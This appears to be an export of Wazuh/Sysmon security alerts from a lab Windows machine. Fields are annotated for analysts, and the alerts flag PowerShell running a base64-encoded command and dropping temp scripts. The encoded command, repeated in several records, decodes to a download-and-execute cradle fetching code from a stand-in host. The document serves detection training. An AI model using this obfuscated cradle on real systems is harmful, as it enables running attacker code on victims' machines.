Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00}
ParentProcessId: 2804
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:24.351 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce8-680a-e30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2804 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 36 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1175115 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:27.2071521Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282794 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:27.162
ProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00}
ProcessId: 14284
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vr2cdhun.rr0.ps1
CreationUtcTime: 2025-04-24 22:36:27.160
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:27.162 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce8-680a-e30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vr2cdhun.rr0.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:27.160 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 33 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1177884 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:29.5433971Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282818 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:28.213
ProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00}
ProcessId: 1468
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00}
ParentProcessId: 14284
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:28.213 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcec-680a-e50a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1468 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 37 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1185951 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:29.7188541Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282819 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:29.700
ProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00}
ProcessId: 1468
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_eamq14se.2pz.ps1
CreationUtcTime: 2025-04-24 22:36:29.700
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:29.700 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcec-680a-e50a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1468 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_eamq14se.2pz.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:29.700 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 34 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534223.1188716 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:32.1375533Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282849 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:30.544
ProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00}
ProcessId: 11608
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00}
ParentProcessId: 1468
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:30.544 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcee-680a-e70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11608 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
